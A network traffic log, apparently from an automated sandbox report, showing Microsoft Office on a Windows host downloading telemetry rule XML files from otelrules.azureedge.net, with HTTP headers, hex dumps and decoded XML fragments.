                            2024-11-14 22:39:07 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                            Session IDSource IPSource PortDestination IPDestination Port
                            101192.168.2.45522913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:07 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:07 UTC517INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:07 GMT
                            Content-Type: text/xml
                            Content-Length: 1358
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                            ETag: "0x8DC582BE022ECC5"
                            x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223907Z-16547b76f7fknvdnhC1DFWxnys0000000m7g00000000tsy5
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:07 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                            Session IDSource IPSource PortDestination IPDestination Port
                            102192.168.2.45523013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:08 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:08 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:08 GMT
                            Content-Type: text/xml
                            Content-Length: 1389
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                            ETag: "0x8DC582BE10A6BC1"
                            x-ms-request-id: c22da945-001e-00ad-15a1-36554b000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223908Z-16547b76f7fknvdnhC1DFWxnys0000000m5g000000012fmw
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:08 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                            Session IDSource IPSource PortDestination IPDestination Port
                            103192.168.2.45523113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:08 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:08 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:08 GMT
                            Content-Type: text/xml
                            Content-Length: 1352
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                            ETag: "0x8DC582BE9DEEE28"
                            x-ms-request-id: 26c42504-001e-0017-7560-350c3c000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223908Z-164f84587bfgp2sdhC1DFWyhvn00000000h000000000mt9u
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:08 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                            Session IDSource IPSource PortDestination IPDestination Port
                            104192.168.2.45523213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:08 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:08 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:08 GMT
                            Content-Type: text/xml
                            Content-Length: 1405
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                            ETag: "0x8DC582BE12B5C71"
                            x-ms-request-id: 6b9ee1ab-f01e-0071-4fa1-34431c000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223908Z-1866b5c5fbbzcdbqhC1DFW3r3400000000fg000000007c03
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:08 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                            Session IDSource IPSource PortDestination IPDestination Port
                            105192.168.2.45523313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:08 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:08 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:08 GMT
                            Content-Type: text/xml
                            Content-Length: 1368
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                            ETag: "0x8DC582BDDC22447"
                            x-ms-request-id: 76271b94-301e-003f-3d00-36266f000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223908Z-1866b5c5fbbpxkkxhC1DFWhvmc00000000h000000000mkm5
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:08 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                            Session IDSource IPSource PortDestination IPDestination Port
                            106192.168.2.45523413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:08 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:08 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:08 GMT
                            Content-Type: text/xml
                            Content-Length: 1401
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                            ETag: "0x8DC582BE055B528"
                            x-ms-request-id: 93dd010c-d01e-0014-6aab-36ed58000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223908Z-16547b76f7f7rtshhC1DFWrtqn0000000m5g0000000108d7
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:08 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                            Session IDSource IPSource PortDestination IPDestination Port
                            107192.168.2.45523513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:09 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:09 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:09 GMT
                            Content-Type: text/xml
                            Content-Length: 1364
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                            ETag: "0x8DC582BE1223606"
                            x-ms-request-id: 8a3ffa53-d01e-002b-0916-3625fb000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223909Z-164f84587bfgp2sdhC1DFWyhvn00000000qg00000000448v
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:09 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                            Session IDSource IPSource PortDestination IPDestination Port
                            108192.168.2.45523613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:09 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:09 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:09 GMT
                            Content-Type: text/xml
                            Content-Length: 1397
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                            ETag: "0x8DC582BE7262739"
                            x-ms-request-id: 2ce7ce6f-901e-002a-1fd2-2c7a27000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223909Z-16547b76f7f7lhvnhC1DFWa2k00000000m3000000000vysk
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:09 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                            Session IDSource IPSource PortDestination IPDestination Port
                            109192.168.2.45523713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:09 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:09 UTC517INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:09 GMT
                            Content-Type: text/xml
                            Content-Length: 1360
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                            ETag: "0x8DC582BDDEB5124"
                            x-ms-request-id: 86fb53ab-501e-0078-4ed2-2c06cf000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223909Z-16547b76f7fknvdnhC1DFWxnys0000000m7g00000000tt29
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:09 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                            Session IDSource IPSource PortDestination IPDestination Port
                            110192.168.2.45523813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:09 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:09 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:09 GMT
                            Content-Type: text/xml
                            Content-Length: 1403
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                            ETag: "0x8DC582BDCB4853F"
                            x-ms-request-id: 4630a231-e01e-0020-14ff-2bde90000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223909Z-16547b76f7fp6mhthC1DFWrggn0000000mf0000000003ca9
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:09 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                            Session IDSource IPSource PortDestination IPDestination Port
                            111192.168.2.45523913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:09 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:09 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:09 GMT
                            Content-Type: text/xml
                            Content-Length: 1366
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                            ETag: "0x8DC582BDB779FC3"
                            x-ms-request-id: fb45f2b4-401e-0016-3630-3653e0000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223909Z-1866b5c5fbbpxkkxhC1DFWhvmc00000000fg00000000me9u
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
